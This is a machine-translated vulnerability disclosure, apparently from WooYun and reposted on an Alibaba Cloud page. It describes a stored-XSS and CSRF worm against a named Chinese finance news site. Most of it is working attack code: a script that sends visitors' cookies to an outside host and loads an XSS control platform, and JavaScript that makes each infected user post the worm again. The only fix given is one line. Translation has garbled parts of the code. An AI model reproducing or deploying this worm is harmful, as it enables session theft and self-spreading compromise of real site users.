Caijing website XSS Worm

Source: Internet
Author: User

Caijing website XSS Worm

Worm = XSS + csrf
 

Address: http://tnew.caijing.com.cn/


First post the post, directly post four parameters without token verification, resulting in a csrf vulnerability.
 


 





After reading the stored XSS, the post content is not filtered, resulting in XSS.
 


 







Next, enter the worm obscenity status:

------------------------------

If you insert <script src = 'HTTP: // wooyun.org/test.js'>



The content of test. js is:

// Introduce automatic post to spread the worm jsdocument. write ('<script src = "http://wooyun.org/fatie.php? Cookie = '+ document. cookie + '"> <\/script>'); // introduce js files on the xss receiving platform, such as beefdocument. write ('<script src = "http://wooyun.org/xss.js"> <\/script> ');





In this way, the request will automatically post the js and the js of the xss platform.



When users access web page introduction: http://wooyun.org/fatie.php? Cookie = (cookie content)



The content of fatie. php can be roughly like this.

Cmstop_username in the website cookie has a user name, from the cookie content transmitted to the database to check whether the worm is in progress for the first time. If this is the first time, the user name is written to the database to prevent repeated posting after the worm occurs. The website returns a js action that performs Automatic posting. The returned js Code is roughly as follows: // the title and content of the article can be collected and stored in the database using php, send different articles to infected with each worm to infect other people with var title = "url-encoded title content"; var content = "url-encoded article content with xss code "; if (window. XMLHttpRequest) {var x = new XMLHttpRequest ();} else {var MSXML = new Array ('msxml2. XMLHTTP.5.0 ', 'msxml2. XMLHTTP.4.0 ', 'msxml2. XMLHTTP.3.0 ', 'msxml2. XMLHTTP ', 'Microsoft. XMLHTTP '); for (var n = 0; n <MSXML. length; n ++) {try {var objXMLHTTP = new ActiveXObject (MSXML [n] ); Break;} catch (e) {}} objXMLHTTP. open ("POST", "http://tnew.caijing.com.cn/Articles/add", false); objXMLHTTP. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); objXMLHTTP. setRequestHeader ("Connection", "Keep-Alive"); objXMLHTTP. send ("title =" + title + "& content =" + content + "& g_name = % E5 % 90% E6 % A7 % BD & g_id = 4 & cate_id = 23 & cate_name = % E6 % 97% A0 % E4 % B8 % BB % E9 % A2 % 98 "); in this way, the spread of xss is realized. Different people send only one post to hide the xss worm.





As for xss. js, simply introduce the xss platform.

  Solution:

Enhanced Filtering
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.